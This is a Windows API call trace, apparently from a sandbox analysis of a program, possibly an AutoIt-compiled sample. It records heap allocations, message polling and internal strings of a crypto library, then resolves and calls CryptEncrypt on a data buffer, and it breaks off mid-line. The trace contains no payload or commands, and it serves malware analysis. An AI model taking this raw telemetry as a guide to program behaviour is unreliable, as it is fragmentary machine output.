[0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.776] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0186.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0186.776] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0186.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.777] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0186.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0186.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0186.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0186.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.778] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.778] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.778] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0186.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0186.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0186.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0186.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0186.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0186.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0186.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0186.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0186.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13925) returned 0x3bf3978 [0186.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf3978 | out: hHeap=0x970000) returned 1 [0186.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0186.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0186.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0186.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0186.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0186.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0186.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.838] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0186.838] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13925, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13928) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: 